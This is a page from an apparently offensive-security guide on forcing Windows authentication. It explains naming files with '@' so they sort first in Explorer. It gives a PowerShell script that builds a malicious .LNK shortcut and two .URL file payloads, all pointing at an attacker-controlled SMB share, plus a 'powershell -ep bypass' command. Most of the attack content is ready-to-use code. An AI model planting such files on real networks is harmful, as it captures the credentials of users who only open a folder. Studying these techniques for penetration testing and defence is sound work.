This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Authentication Triggers and Forcing Techniques

Some magic behind file naming

Files are sorted by ASCII codes when using (sort by name).

So what?

As we know the ASCII value of the first letter is 65 for letter A but the ASCII value for character @ - you will see it in the examples below - is 64 so it appears before any named file that have only alphabetical characters in its name.

This also works with any character that have a smaller value than 65.

Fact: Numerical character 1 has the lowest ASCII value (49) upon all the usable characters in naming files.

Understanding Authentication Triggers

Poisoning Attack Dependencies

Problem: Poisoning attacks are passive so they wait for natural authentication events that may never occur.

Solution: Active triggering, how? by forcing clients to attempt authentication to attacker-controlled services.

Attack Flow: 

Trigger Deployment β†’ Client Interaction β†’ Authentication Attempt β†’ Poisoning Response β†’ Credential Capture

Requirements:

  1. Method to deliver the trigger payload or file like SMB shares, E-mail, and so on.

  2. User interaction like clicking on the file (maybe the user is just curious) or just the file appearing to a user in Windows file explorer.

Malicious .LNK & .URL Files

For PowerShell scripts, you must enable the execution policy so that the script can create the file.

powershell -ep bypass

Malicious .LNK Files (Windows Shortcuts)

# This only requires the user seeing it
$AttackerPath = '\\\\<attacker-ip>\\share\\'
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut('@Important Document.lnk')
$Shortcut.TargetPath = "$AttackerPath\\attack.exe"
$Shortcut.IconLocation = "$AttackerPath\\icon.ico"
$Shortcut.Save()

Malicious .URL Files (Internet Shortcuts)

Sometimes the icon method fails because Windows may fall back to a default icon, preventing the authentication trigger.

# Method 1
echo "[InternetShortcut]
URL=Anything
WorkingDirectory=Anything
IconFile=\\<attacker-ip>\share\icon.ico
IconIndex=1" > '@malicious.url'

# Method 2
# Sometimes this requires user interaction
echo "[InternetShortcut]
URL=file://<attacker-ip>/intranet/portal
WorkingDirectory=Anything " > '@malicious.url'
PreviousPoisoning AttacksNextLateral Movement

Last updated

Was this helpful?